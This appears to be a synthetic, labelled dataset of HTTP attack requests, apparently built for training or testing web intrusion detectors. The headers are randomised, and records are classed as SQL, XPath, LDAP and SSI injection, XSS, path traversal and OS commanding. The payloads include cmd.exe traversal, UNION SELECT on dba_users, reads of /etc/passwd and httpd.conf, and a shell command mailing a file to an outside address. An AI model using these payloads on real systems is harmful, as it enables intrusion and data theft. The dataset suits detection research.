UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5914x483
Via: HTTP/1.6 www.o2o2rtes.gif, 0.4 61.159.11.145
Transfer-Encoding: oheGd
Upgrade: 7r8/5.9, eevr/0.1, escfA/5.5, itqIta/3.3
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 80.139.161.110
X-Serial-Number: 431124702375
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41834
Start - Id: 36559
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 12.54.188.83
Connection: keep-alive
Accept: application/zip
Accept-Charset: *
Accept-Encoding: identity;q=0.5, deflate;q=0.2
Accept-Language: *;q=0.1
Cache-Control: max-age=3
Client-ip: 197.131.59.208
Cookie: j6WQKtdR=d_B7U;madsn=lrRnszyaaS9'i;fnwt0=53888
Cookie2: $Version="25"
Date: Mon, 16 Oct 06 10:19:10 GMT
ETag: "._sHr99T4AKY.QbUteoU"
Expect: e2h0
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Sun, 12 Nov 06 19:21:23 GMT
If-Unmodified-Since: Sat, 22 Dec 07 17:03:41 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 5.7
Pragma: Q='faaoepns'
Proxy-Authorization: 4eitC tieta=unrJ6ewe
Authorization: e7kTa pefo=hIoR
Range: -7292
Referer: http://www.mb8o7rr.gov/Hw7ha/wyyt/eosse/eq3iahnj/rNtts.wmn
TE: deflate
Trailer: If-Match
User-Agent: Mozilla/8.6 (compatible; Konqueror/9.7; Solaris; stoIea)
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 547x5195
Via: enogs/8.6 www.tetqra.jpg:2, 3.7 196.40.24.71, 6.1 www.2pocs.jpeg
Transfer-Encoding: deflate
Upgrade: iOe8/3.1
Warning: 384 103.114.33.177 "eR8ioli" "Sat, 15 Oct 05 19:32:06 GMT"
X-Forwarded-For: 232.88.214.55
X-Serial-Number: 33496662681000
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36559
Start - Id: 35116
class: SqlInjection
GET /e5rvVJ2CK/ClZallFUqdRVi9TV@/rPZpEfdHWnrCgfi/fu@zWgr55/CJttmp8/e52usvdotapalgh.html?oTts=98&edtovbdr=roywtoT+eanA&leiaerkn=a2imrtNce&cxZIxgKwinntlinkV=ngt&eaoj=nniomu3Tunion%26en&lep=9267&li7h=38108&sxIurTzrSeoo6uh=hhb&hncaA=74801982 HTTP/1.1
Host: 87.72.190.212
Connection: keep-alive
Accept: video/*;q=0.3
Accept-Charset: gb2312;q=0.7, koi8, x-mac-roman;q=0.9, koi8;q=0.6
Accept-Encoding: deflate;q=0.4, deflate;q=0.9, identity, gzip;q=0.8
Accept-Language: ie3eb-hd7;q=0.1
Cache-Control: only-if-cached
Cookie: acewSsn=reaestpeexec 5a%4:rfd;updatecopyRYL7=chairs'   UN/**/ION    SEL/**/ECT  ud     FROM  dba_users    WHERE    tMteT like     '%25;Aheaon83az=3dco
Date: Thu, 20 May 04 18:06:31 GMT
If-Unmodified-Since: Mon, 17 May 04 17:29:46 UTC
Authorization: nrbirr tord=mangnoyj
Referer: http://vele4a.fr/a4d5xne/nLUId/oNixeg/rfonwr.msf
User-Agent: Mozilla/7.4 (Machintosh; U; PPC Mac OS X 6.1; di-oa; rv:1.7.8) Gecko/81534798
UA-OS: Win9x
Via: 0.7 www.e6jyWN.htm
Transfer-Encoding: compress

null

End - Id: 35116
Start - Id: 49709
class: XPathInjection
GET /evbet/7opa/MYjL.cgi?7rMiCJ4=%40%28%28mneo+ltd9%7C%7E&dq1nwpbxgwisa=ri5%3Fa9c%29ot&sooeihpdtb5tn=sudahvdmunoarstwtg&7n=yec%40&vd=6230833&0s0itn8S5Vtgbme=e6efah%27+++++or++n1ncs%2FTiat%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D557%5D+or+++++%27wi%27+++%3D+++%27&htptYsr=030363 HTTP/1.1
Host: 158.51.29.234
Connection: dece
Accept: application/*;q=0.9, audio/basic;q=0.7
Accept-Charset: euc-jp;q=0.3
Accept-Encoding: 
Accept-Language: t5da-rdeJdoc, c5a-atTe;q=0.6, an-1djXTe8;q=0.3
Cache-Control: no-transform
Client-ip: 25.213.247.107
Cookie: sLtbaltit0smco=2
Cookie2: $Version="241"
Date: Sun, 18 Jan 04 22:13:29 CET
ETag: W/"s3klw_r.kke6tQh"
Expect: eTteO
From: Etbaese@jwshhAoe.net
If-Modified-Since: Sun, 07 Jan 07 08:41:44 GMT
If-Unmodified-Since: Sat, 28 May 05 15:34:13 CET
If-Match: *
If-None-Match: "3qCge@5u2nT7bF9"
If-Range: *
Max-Forwards: 8392
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM dHBtcm83aGFDT2VvdGpoeXJudHVia2lidXQwa3I4Ym5vZDJsc3ZvaXM=
Authorization: Digest opaque="3udRemTa"
Range: 0-,006-0351
Referer: http://cTas.biz/eoeoi/esid/seofy/sbhmi6/nraetns.txt
TE: gzip,chunked;q=0.8,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.6 (Machintosh; U; Mac OS X 9.8; ps-ea; rv:2.2.6) Gecko/73307933
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6094x1402
Via: Uao3rt/9.1 www.amaaniaa.css, dti44/2.6 www.ktdzY.jpeg:7139
Transfer-Encoding: gzip
Upgrade: hdoAgi/1.2, icsn/0.8, don/0.5
Warning: 018 www.iupl6.jpg "b3zD8yiorsn" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 13247958
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49709
Start - Id: 44090
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.amshr.de
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 237.235.110.125
Cookie: eeeiMopenP=990;il=vsed;lcnrr5s2a=10368556;@RUTJMIHf=89428;7F@epGNNrE03=ntu5;zuysesujo45mied=d
Cookie2: $Version="617"
Date: Mon, 29 Sep 08 19:31:00 GMT
ETag: "ZS9GbP3St8Y_vcI."
Expect: 1ewSot=i8my
From: ixam@eaec.uk
If-Modified-Since: Fri, 31 Oct 08 09:27:26 UTC
If-Unmodified-Since: Sat, 01 Oct 05 18:17:51 GMT
If-Match: *
If-None-Match: *
If-Range: "nqyUNpCJJmNI08R"
Max-Forwards: 08
MIME-Version: 0.4
Pragma: tpee3pwh=etrzuti
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: Basic YmlvdHRicG46R2hvY2N5dA==
Range: 70-
Referer: http://www.mjox6a.com/yw1sod/wOtt/rnadika/ilyh.bin
TE: trailers,deflate,deflate
Trailer: Authorization
User-Agent: Mozilla/4.7 (Machintosh; U; PPC Mac OS X 9.3; ai-lx; rv:1.6.7) Gecko/18205095
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1501x189
Via: 3.2 www.wdri72.tiff
Transfer-Encoding: hOUe
Upgrade: unHis2/9.7, sDw/8.7
Warning: 578 121.175.223.34:52334 "pneeY2IslooLh" 
X-Forwarded-For: 91.48.222.8
X-Serial-Number: 388289600968011
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44090
Start - Id: 46434
class: PathTransversal
GET /CIGF6oQUqLcB/yciatoowdaet/nPbu_NjqTkvmYFzAbvs/n_j/3mrxIfrlKaTZE-/sXa/peaao8tnN/cr9wBt5kf4QIKc/igfx5Ge4SJCuXp.css?ACnn=6568052&dgr8EeelIr=85791&risahoigeLgd8pd=61123&processing-instructionBidrw0d4p=nes%285&puLlcBeo=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&lnaten=eSueoeee2t&csNOReHsnct=no%29raat6Irm7Dpl&lPQE0Ek44.=t++s1%3C&ONscaiselhnJR=3ii04as48ialy HTTP/1.1
Host: 33.107.59.52
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-ce
Accept-Encoding: 
Cache-Control: max-age=55
ETag: W/"hYCZerIbKrHZOrQX"
Expect: efis=azEs
From: efsAt@teeaL.gov
If-None-Match: "hiGbkOlOzwNnnzNS3g"
Max-Forwards: 60
MIME-Version: 2.8
Authorization: Digest response="04d791aA5cC5dfa95dD2dDF84c2b9F4F"
Referer: http://rbuil.uk/rrNi/iebsl.msf
User-Agent: sQcuVwhja1 http://www.h3lr.be
Upgrade: osljgc/9.8, loaxc/0.1, 7cifs/7.3, icF/3.5, Rilh/0.1

null

End - Id: 46434
Start - Id: 47575
class: XSS
GET /9jlYAvPIrAAd.cgi?62cashtetme=dttn%22+++++%3E%3Cbody%2520onload%3Dalert++++%28document.cookie%29%3B++++%3E&QCAea=Ht9nvat7&pe4uitkF=2&ssei5=c81i&8zpc=nvtrMCulty2fT%29+dropzxa&gAwhehlmbg=2tqn5yeBng9rnhltD&qIFKc=ux%5Chr%3B+sto%25lshi1asa&nmsOxerhieknu=056521 HTTP/1.0
Host: www.ra3r4ucdf.uk:80
Connection: iIanm7
Accept: application/*, video/mpeg
Accept-Charset: iso-8859-9, x-mac-turkish;q=0.8, hz-gb-2312
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 118.106.166.150
Cookie: eEamfRiuea=rye;Yb=ecmd;etKYn=85882759;NgxunionfwyrFu=r0nrtoabuamx;y6Pdl=eps;V2Kselect_f=in
Cookie2: $Version="36"
Date: Fri, 05 Jun 09 05:39:15 GMT
ETag: W/"ykYpVFv4o2eRsz_1U"
Expect: 100-continue
From: we7o1cGs@2OwoTmtOk.com
If-Modified-Since: Wed, 02 Sep 09 06:41:57 UTC
If-Unmodified-Since: Fri, 16 Jan 09 14:14:54 GMT
If-Match: "s7b7MVjb72gaeV.54hD"
If-None-Match: "sCDkRMtwilDfh0feU6"
If-Range: *
Max-Forwards: 94
MIME-Version: 4.9
Pragma: i=o5fs
Proxy-Authorization: Basic dHJ4ZTg4OmlvRnM=
Authorization: NTLM c0N0OXk2dGlnYTZtZEVuRVRob3plNXZlaXNsTGlneGdhd3hoZXZt
Range: 7-,-18566
Referer: http://www.vbn0aon.uk/cotlnz/aaSosteh/dmsl/m5lir1/tbIze.jsp
TE: trailers,deflate;q=0.2
Trailer: If-Match
User-Agent: caSdhl4giTjelhiiCn
UA-CPU: StrongARM
UA-Disp: 2757,1725,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 924x017
Via: 9idere/1.6 190.7.161.71:54757, FTP/9.9 34.35.147.201, FTP/3.7 218.153.178.54
Transfer-Encoding: deflate
Upgrade: eTere/4.3, ulLei/2.8
Warning: 084 236.106.31.192:22 "edNteueotaOrbpOeua" "Thu, 03 Jun 04 03:45:24 GMT"
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47575
Start - Id: 46299
class: PathTransversal
GET /3tee/uadUU8HnS/bvVYE5y5/q46ea/8bacohelpc1Hlfe/yn2se2/VlinkPwindow.openZbno1bodyadminXL.asmx?tL398SgaLLHL=393&ette4r5i9lb55Og=h&4edgonnv=%3A&5lyh00a=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fihr.conf&LSfstdin1h=37654372&eua3amnkaup=4&ec=94119513&aqhea7eui=35781 HTTP/1.0
Host: www.abna4iea.de:23
Connection: keep-alive
Accept: audio/*;q=0.4, text/plain
Accept-Charset: iso-8859-5;q=0.7, windows-1252;q=0.3, x-mac-chinesetrad, euc-tw;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 34.236.80.20
Cookie: s8=hNauwilsGlt2aoe
Cookie2: $Version="73"
Date: Sat, 19 Mar 05 03:13:10 CET
ETag: W/"l1XkmFGdW1ggoyh14oL"
Expect: 100-continue
From: twei@aedq.de
If-Modified-Since: Thu, 13 Dec 07 21:04:21 UTC
If-Unmodified-Since: Tue, 20 Dec 05 24:56:40 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 16 Mar 08 07:24:41 CET
Max-Forwards: 81
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic aGlFYTp3YXR0T24=
Authorization: Basic aEVTRHNkd0U6YXBhamNlZA==
Range: 5-,07-2
Referer: http://cEx9fl.de/eaeeeu.gif
TE: gzip;q=0.9,trailers,gzip;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.5 (X11; U; SunOS sun4u 5.0; cs-ee; rv:1.7.2) Gecko/72475916
UA-CPU: 68000
UA-Disp: 542,0115,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: 3.7 www.yilftr.gif:2112, ait/3.7 103.159.168.69
Transfer-Encoding: gzip
Upgrade: apEzao/7.4, nrcgos/4.1, Wles/0.2, Iiw/3.3
Warning: 165 170.166.64.203:01144 "oSte0enOhlsosme9awi" 
X-Forwarded-For: 207.118.108.52
X-Serial-Number: 0260257
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46299
Start - Id: 38186
class: LdapInjection
GET /rfQQh/zo.jYd9MdhLw_pc/pnk.0/tgkGzLUw0/Gadmin/xgrsneAl.aspx?motFr=59kD&piit1tztsnr=weuhd+gtt5soicates3eu&dceEch9Rqn1hcwm=hfrom&5et=m7t%29%28%26%28objectClass++++%3Dnes*%29&setnhorsae=toU&entaEeuni=uiodtmp&sTrE=%5D%29e&en=713971&ca=8534&dropZaIDuH0y-=tnwsqian5o&ieetei=htAa&yeqe2Asr=hD1KoOrefsc HTTP/1.1
Host: 35.128.160.109
Connection: close
Accept: text/*;q=0.8, audio/basic, video/quicktime
Accept-Charset: iso-8859-15;q=0.5, cp-932, ks_c_5601-1987, iso-2022-jp, iso-8859-8-i;q=0.5
Accept-Encoding: 
Accept-Language: 0y-wen;q=0.9
Cache-Control: min-fresh=42
Client-ip: 238.249.58.159
Cookie: hwcuyaoeots5= hy;hrr2enaspmsW=ty
Cookie2: $Version="7"
Date: Fri, 30 Apr 10 21:04:42 UTC
ETag: W/"cvMbx4sfux4.USQJj"
Expect: ni4g=eota
From: nethi@otsenrjp.biz
If-Modified-Since: Thu, 31 Aug 06 21:36:03 GMT
If-Unmodified-Since: Thu, 14 Jun 07 18:11:24 UTC
If-Match: "PCpCyEr4wBxZbGeJS"
If-None-Match: "rcGcf5-ncVqlFbK8"
If-Range: *
Max-Forwards: 60
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: rlgd pkAree=ohoel
Authorization: Basic b3JucTpiUkV2ZTduZA==
Range: -49,281-
Referer: http://www.5eSa.ch/ihibono/gaat/qhefAeh/eGfttiAs/eyeiui.php3
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: e40-E8kw http://www.delaeg05.it
UA-CPU: PowerPC
UA-Disp: 747,821,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5505x7135
Via: HTTP/4.9 www.ntt4eA.jpg:06
Transfer-Encoding: deflate
Upgrade: rho/1.8, riptm/6.0
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 276586158043
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38186
Start - Id: 41724
class: SqlInjection
GET /nPMOMr/erxtaaaa1ztoo0mfl52s.bin?tihria=95361635&A5gG=%27+%29+++UNION+ALL+SELECT+++93++FROM++eienz++WHERE++%28++%27%27++%3D++++%27 HTTP/1.0
Host: 32.115.33.44
Connection: close
Accept: image/*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=61771
Client-ip: 157.27.150.132
Cookie: StonatoiU=8160980;tlim=ecmdtes7;oEo4l0=ht;mwn=153531671;eoiaL8ca=ad95mQLzeDnF
Cookie2: $Version="483"
Date: Tue, 23 Nov 04 17:09:38 CET
ETag: W/"PrIp4l.4vZHLyz7"
Expect: 100-continue
From: 0RBmShi@t0btiu.st
If-Modified-Since: Mon, 21 Aug 06 02:17:40 GMT
If-Unmodified-Since: Wed, 31 Aug 05 01:06:24 CET
If-Match: *
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: *
Max-Forwards: 3974
MIME-Version: 9.0
Pragma: en=3
Proxy-Authorization: Basic cnF5cmFkbWk6N2kzM2Q=
Authorization: Basic M2llaUdzM2k6YW5uZWFkdA==
Range: 2985-,9268-37,-4
Referer: /itgsesne/vSnr/3msoer/lmpel.mdb
TE: trailers,chunked;q=0.8
Trailer: Via
User-Agent: kemwpnholpuceitjbcs
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 431x0868
Via: 0.1 www.Rdwt.tiff:02, if64e/2.6 www.0sAkeTSs.html
Transfer-Encoding: compress
Upgrade: aah/4.0
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 611965021882313
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41724
Start - Id: 45421
class: PathTransversal
PUT /oDYlhqTxaXvGI5dOwpl/hos1y4gartaEnS/ods/h97qQ5Hld7QCuF35rFmz/zmrea9tOxN/cbowitekttmn5i/7Dqw6FBaL/antaaseiierjuenncnri.swf? HTTP/1.0
Content-Length: 284
Content-Language: eep,6o,o5eaD
Content-Encoding: identity
Content-Location: http://ntEiE0.gov/eneBrae/3tar.exe
Content-MD5: M2c2dHRlbmhrbnRyM25hTw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 May 04 09:48:32 UTC
Last-Modified: Tue, 15 Nov 05 23:14:13 UTC
Host: 150.192.246.194:1
Connection: eayor2Ic
Accept: */*
Accept-Charset: koi8;q=0.1, iso-8859-4;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 186.229.57.172
Cookie: swhhlsoanolc=xtermeewget3tq%e;ssylqlrotsiu=253816321;eedkwn7nfci=5301;positionrNJd= h
Cookie2: $Version="79"
Date: Tue, 02 Oct 07 09:13:51 GMT
ETag: W/"YIv7-YIQ3UOzG@Xq"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sat, 31 May 08 21:00:31 CET
If-Unmodified-Since: Sun, 11 Oct 09 24:38:49 GMT
If-Match: "UEz5I0Gr9q@D7yhf"
If-None-Match: *
If-Range: Wed, 24 May 06 16:31:04 GMT
Max-Forwards: 9
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: eOpgl ldhoil=meunte
Authorization: Digest uri=http://www.m5nloe.org/4eeakBol/eapkosh/3Ywyooee/elesafsm/rdcrisne.exe
Range: -292636,082693-
Referer: http://www.oerohccO.net/erlWtlV/etrdeenz/Efide/thedeEz.swf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.0 (X11; U; SunOS sun4u 2.5; ew-bR; rv:3.0.3) Gecko/64387693
UA-CPU: PowerPC
UA-Disp: 282,5050,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 863x2272
Via: HTTP/5.4 www.isiktvkv.css:4322
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 7007774658100
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rroadhn=uirlD&wncxsCttpteo=documentu\1&e0ec=foe&AIcopy1ZcathE5x8n=27&IeTnyzMiV= y e7&enyoeTs=oobnyOgroup bys96nc~oxmlhwrT &tU=9877794&acceptj-Owe6=../../../../../../WINDOWS/autoexec.bat&nki=laAemz=[8k&xwhd=99&oxarpecn7o=Svmhu&ctanIarc=;uobjectt &ards=crtoh3]

End - Id: 45421
Start - Id: 39646
class: SSI
GET /essoH.Phs3f7@tZrBrI/kadmtoeedNtv8rent/0ae5YMv.M/sniireaReidgnsee/8eaesaonp3Anatvj/s8kbecgreeme/rIMOQi81/dagrcaHoesxf/mo9yrk6vh.cgi?fldnEsndahleeiu=nc3e&o8gHL3ra-r8=%3C%21--+++++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&DjbfvznSG=++d&lTXYwtftpkJvpinsert=990&uzs=o8SOVege- HTTP/1.0
Host: www.isaei.com:572
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: gb2312, windows-1250;q=0.4, x-mac-cyrillic, x-mac-cyrillic;q=0.8, x-mac-ce
Accept-Encoding: 
Accept-Language: age-vpra9Bsk, entt44d-ewes;q=0.6, thtt-o6;q=0.0
Cache-Control: no-transform
Client-ip: 39.207.20.202
Cookie: lgshtvo0=dzsu;stnp6ld=88865580;etete=ndrcpbino0;TaIhe=90265082
Cookie2: $Version="277"
Date: Sat, 24 Sep 05 04:52:46 UTC
ETag: "Pte5BHI2KbP1-ib2"
Expect: 100-continue
From: npzilkre@eesaoE.uk
If-Modified-Since: Thu, 17 Jul 08 14:02:50 UTC
If-Unmodified-Since: Fri, 20 May 05 08:22:40 UTC
If-Match: *
If-None-Match: "IW37ej9JezZMgRmh"
If-Range: *
Max-Forwards: 4
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: Digest response="7990c8aD25A18B6bFB7a1D1BBAdb1e1f"
Range: 54-,0-33,3-74
Referer: http://www.glTCht.gov/ytlToi/npbrk/5gstraon/esnreg/desmaeS.msf
TE: trailers,trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/9.8 (Machintosh; U; PPC 2.3; tr-hu; rv:2.1.8) Gecko/01400030
UA-CPU: PowerPC
UA-Disp: 749,540,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 587x0700
Via: 9.8 www.nxdsog.jpeg:792, 8.1 179.52.196.3, 6.8 21.9.135.254:153
Transfer-Encoding: compress
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39646
Start - Id: 39215
class: SSI
GET /iefEMKVRzByAj01u/DEU/ndropQ2LnKe/owgOVmmreC-T8/tNQMrZJcvAFsAT/heeigqt/lrselecti.mspx?tmnv=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&ieidroshtArgaei=dso&die8n=r%7C&1Yq37MH0Qv=%2Fahtz&erl=1FElO0un1&replacepositionG94Z=8&rtdfyir=tpcw&3lgino5adin=4934&hd1=or%40tr&emamu2Tmeae=8379240&ideeocoeIO=dtaa&tlc=262270&tssxot=pa3n&tndnpuqxeeanaz=0ye HTTP/1.1
Host: www.atHi9evfw.org
Connection: sher
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eisvshs-eNtg;q=0.6, ve-umcttq;q=0.9, gofa-eta, iwAwui-izwwi6;q=0.0
Cache-Control: no-store
Client-ip: 24.82.201.85
Cookie2: $Version="9"
Date: Wed, 09 Mar 05 04:08:20 GMT
ETag: "stS0mrsBNpQBIdeOv"
If-Modified-Since: Thu, 16 Feb 06 13:00:26 GMT
If-Unmodified-Since: Wed, 14 Nov 07 11:38:39 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Aug 05 04:33:46 UTC
Max-Forwards: 2
Range: 5962-
Referer: http://www.adion2.gov/nsahin/7eva.mdb
User-Agent: EeleCtlceo/5.6.1.9
UA-Disp: 7987,886,16
UA-Color: color32
Transfer-Encoding: rprtus
Upgrade: etvee/9.3, tcp7s/3.5, trta/7.7, hrfcrn/6.4
Warning: 988 51.40.12.35 "rctnf7iObtnydwbkia" "Sat, 31 Dec 05 16:12:13 GMT"
----: -----------------------------------------

null

End - Id: 39215
Start - Id: 48490
class: XPathInjection
GET /1tGHtuNxNKD-AsNxA.gif?PgiaeO=rIe6HS4adawt&dal=uePhtb&msoeot=37&Pela6bahadgder4=erezoJs&IyatxatE=by%7C&tNhhsbeuwsche=77&Nfe=5w&lkTwec=mi01O%40CI5u&phpoq7g=ado&on=s1wBU9KQe&dhumywt=1ptuo2tHeaa&oecpmrqobqi=ytxoscn&x3PNaNwp-=window.openi HTTP/1.0
Host: 54.173.254.176:80
Connection: keep-alive
Accept: video/quicktime;q=0.6, video/quicktime;q=0.3, text/plain
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.4
Cookie: bt=qAmo'   or    1<  aeuto/n/iin/child::text()[position()=673]  or    'tu'    =';s9T=lomn4;o7uodbimamrnsef=26;sikmbfdfatemeg=dlWx9-hG;Ae=eitie7ssInrt9at
ETag: W/"xHJ46.N9jrI1loQ5_"
If-None-Match: "iYNtkQ6BGyaeDiMuVA"
If-Range: Mon, 07 Mar 05 09:17:34 CET
Max-Forwards: 508
Referer: http://2esuohlT.fr/szhtn/hhid/raoot/vtodna.mdb
User-Agent: owvsaat (noDXwiLna; eRPbX3bC; i.ZH0ISwIn; dmHOy_; oP2usHYsuI)

null

End - Id: 48490
Start - Id: 40456
class: SSI
GET /Ks/swd/phpxu7rlogPYE_C/hR8iIVS/oORoH5xfnjAiM2cSg0/aT4t/j7acnunuw4ametva.css?smnee9Cuisas=replacedr%3FMen%5Dae&8arttkNesxH=870&ElkfDeevnrttht=coxterm%3Aa24bctprnupdatea%3Ddoa0&rfretsDnmsewt=59&7t=%3C%21--++++%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E&hjeCpej22i=dQZCnwgy8BR&5lytcU=30&tlibEl.k15Iw5=uu&uasvcoHltttwey4=yc2aatNfedmgesrn HTTP/1.1
Host: www.ltet7up1.org
Connection: keep-alive
Accept: image/*
Accept-Charset: x-mac-hebrew;q=0.1, windows-874;q=0.2, windows-1257, windows-1257;q=0.2, iso-8859-6
Accept-Encoding: gzip;q=0.8, gzip, compress, gzip;q=0.2, compress;q=0.5
Accept-Language: iflrex-nr6ePs;q=0.6, owx-l;q=0.2
Cache-Control: only-if-cached
Client-ip: 202.75.46.235
Cookie: eotdrA0el=799;ttobts=3323532
Cookie2: $Version="7"
Date: Fri, 14 Dec 07 05:29:31 GMT
ETag: W/"Qw2wTPXDDGTkY-yl3G"
Expect: 100-continue
If-Modified-Since: Mon, 21 May 07 20:06:19 GMT
If-Unmodified-Since: Fri, 26 Dec 08 12:52:50 GMT
If-Match: "LjULHpsk4AfpS-5gW"
If-None-Match: *
If-Range: Sat, 02 Jan 10 14:06:08 GMT
Max-Forwards: 742
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic cm1lbzpTZWFu
Authorization: nmjath mwyi=Leahles
Range: 688-12571,5864-06540,0825-1066
Referer: http://tede.be/jhaik/untor.ace
TE: trailers,chunked;q=0.1,trailers
Trailer: If-Match
User-Agent: erts8/5.3.7.5.3
UA-CPU: 68000
UA-Disp: 0939,1824,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 025x185
Via: FTP/7.9 www.xtmyN.gif, efr/7.2 185.183.103.247, qrist/9.8 13.180.186.74
Transfer-Encoding: compress
Upgrade: 5tNn/1.3, eSn/8.3
Warning: 218 www.tisoHb.htm "wmoeMido5" "Sun, 29 Feb 04 21:33:45 CET"
X-Forwarded-For: 109.247.28.154
X-Serial-Number: 98565372421828
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40456
Start - Id: 36731
class: OsCommanding
GET /aeItustoernScluei/stirsnliiaosCHeftno.msf?oZ=%27+++%3Bcat+++%2Ftmp%2Fres+++++mail++++alriniti%40insi.com++%3B&lnllt7smyMeim=ney HTTP/1.1
Host: www.wliw8d.be:80
Connection: close
Accept: image/gif;q=0.6, text/*, audio/*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.6, compress, compress, identity;q=0.2, deflate
Accept-Language: *
Cache-Control: max-stale
Client-ip: 103.144.20.186
Cookie: MdUY7Zgc7e=dKs;enn=tSDb
Cookie2: $Version="7"
Date: Thu, 23 Mar 06 03:29:38 UTC
